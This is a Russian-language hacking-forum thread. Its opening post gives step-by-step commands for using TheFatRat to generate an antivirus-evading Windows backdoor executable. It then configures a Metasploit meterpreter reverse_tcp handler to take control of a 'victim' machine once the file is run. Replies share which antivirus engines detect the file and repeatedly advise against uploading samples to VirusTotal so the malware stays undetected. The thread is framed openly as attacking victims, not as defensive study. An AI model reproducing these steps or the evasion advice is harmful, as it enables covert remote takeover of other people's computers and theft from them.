Статья The Fat Rat Backdoor. 100% эксплоит (не детектится антивирусами)

Общий Салам!
Хочу Вас познакомить с одним замечательным генератором TheFatRat.

Шаг 1. Устанавливаем git
sudo apt-get install git
Шаг 2. Клонируем исходники генератора
git clone https://github.com/Screetsec/TheFatRat.git
Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
chmod +x fatrat и chmod +x powerfull.sh

Шаг 5. Запускаем генератор для этого введите ./fatrat
Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Перед отправкой на VirusTotal прочти здесь !
Шаг 10. Запускаем msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 5555
exploit

Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
 
Мне нравится Ваша статья, когда-то читал про FAT-RAT, а в каких условиях вы тестили?
 
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Непроверяйте на virustotal,Непроверяйте на virustotal,Непроверяйте на virustotal:confused:
 
  • Нравится
Реакции: Alexs565 и Raj_Hack
Решил опробовать. попробовал на 2 антивиря определили: IKARUS Security: Trojan.AD.Swrort и Norton Antivirus: Heur.AdvML.B

норм:)
 
Алейкум салам!

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

Мне тоже понравилась твоя статья. Продолжай в том же духе.

По существу: на x64 бы починить)
 
Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
 
Последнее редактирование модератором:
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.

Cделать раздел закрытым > Этичный хакинг и тестирование на проникновение пускать людей кто в теме у кого прокачены скилы.
 
  • Нравится
Реакции: Vander
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
 
Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
Те кто намеренно делает это одно, а кто по незнанию это другое. А вообще идея diod_ более оптимальна. Я и пояснил это задача Администрации, её решить можно хоть и не на 100% но хотя бы частично.
 
Алейкум салам!

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

Мне тоже понравилась твоя статья. Продолжай в том же духе.

По существу: на x64 бы починить)
У вас не работает на x64?
 
еще один сканер, не замеченный в сливе антивирусным компаниям
но базы не всегда актуальны
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!